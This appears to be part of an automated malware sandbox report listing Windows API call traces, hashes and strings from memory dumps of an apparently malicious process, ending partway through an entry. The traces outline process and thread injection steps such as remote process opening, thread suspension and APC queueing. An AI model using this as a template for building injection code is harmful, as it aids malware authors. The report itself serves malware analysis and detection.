Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
